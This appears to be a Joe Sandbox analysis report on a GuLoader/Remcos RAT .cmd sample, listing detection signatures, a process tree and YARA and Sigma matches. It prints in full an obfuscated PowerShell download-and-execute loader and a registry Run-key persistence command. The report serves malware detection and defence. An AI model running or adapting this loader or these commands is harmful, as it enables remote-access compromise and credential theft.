Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rIMG465244247443GULFORDEROpmagasinering.cmd

Overview

General Information

Sample name:rIMG465244247443GULFORDEROpmagasinering.cmd
Analysis ID:1538407
MD5:d4a5745ec008932bec834b981d31bd8f
SHA1:c57e44498a52b6aa60e55c19a16cb026104fa19c
SHA256:40b46bae5cca53c55f7b7f941b0a02aeb5ef5150d9eff7258c48f92de5435216
Tags:cmduser-Porcupine
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMG465244247443GULFORDEROpmagasinering.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6852 cmdline: powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3272 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7104 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7084 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2596 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 7136 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5428 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5220 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • wscript.exe (PID: 4324 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2002636954.0000000008EE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000002.2002956756.000000000D545000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000004.00000002.1983290797.000000000606C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 6 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_6852.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_3272.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc43f:$b2: ::FromBase64String(
                • 0xb4a5:$s1: -join
                • 0x4c51:$s4: +=
                • 0x4d13:$s4: +=
                • 0x8f3a:$s4: +=
                • 0xb057:$s4: +=
                • 0xb341:$s4: +=
                • 0xb487:$s4: +=
                • 0x151c6:$s4: +=
                • 0x15246:$s4: +=
                • 0x1530c:$s4: +=
                • 0x1538c:$s4: +=
                • 0x15562:$s4: +=
                • 0x155e6:$s4: +=
                • 0xbcea:$e4: Get-WmiObject
                • 0xbed9:$e4: Get-Process
                • 0xbf31:$e4: Start-Process
                • 0x15e7b:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , ProcessId: 4324, ProcessName: wscript.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , ProcessId: 4324, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , ProcessId: 4324, ProcessName: wscript.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gummicheckene
                Sigma detected: Direct Autorun Keys Modification
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7084, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t 